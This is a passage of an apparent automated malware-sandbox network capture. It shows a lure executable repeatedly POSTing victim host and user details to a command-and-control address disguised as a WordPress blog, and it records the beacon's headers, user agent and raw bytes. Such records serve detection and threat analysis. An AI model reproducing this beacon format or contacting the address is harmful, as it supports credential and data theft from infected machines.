                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              79192.168.2.44982945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:42.568420887 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:42.698106050 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:43.526289940 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:42 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:43.526346922 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:43.526410103 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:43.535242081 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:43.535674095 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:43.535784006 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:43.535896063 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:43.536047935 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:43.536063910 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:43.536154032 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              80192.168.2.44983045.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:43.798729897 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:43.932180882 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:44.762820005 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:43 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:44.762876034 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:44.762922049 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:44.771212101 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:44.771611929 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:44.771673918 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:44.771819115 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:44.771982908 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:44.772037983 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:44.772108078 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              81192.168.2.44983145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:45.029470921 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:45.160764933 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:45.973225117 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:45 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:45.973303080 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:45.973407984 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:45.982270956 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:45.982592106 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:45.982779026 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:45.982985020 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:45.983175039 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:45.983191967 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:45.983375072 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              82192.168.2.44983245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:46.244048119 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:46.369883060 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:47.205128908 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:46 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:47.205267906 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:47.205307961 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:47.213737011 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:47.214083910 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:47.214246035 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:47.214337111 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:43:47.214494944 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:43:47.214539051 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:43:47.214576960 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              83192.168.2.44983345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:43:47.479485035 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:43:47.606699944 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:43:48.415240049 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:43:47 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:43:48.415296078 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:43:48.415328979 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:43:48.425446987 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:43:48.425626993 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:43:48.425743103 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:43:48.425856113 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
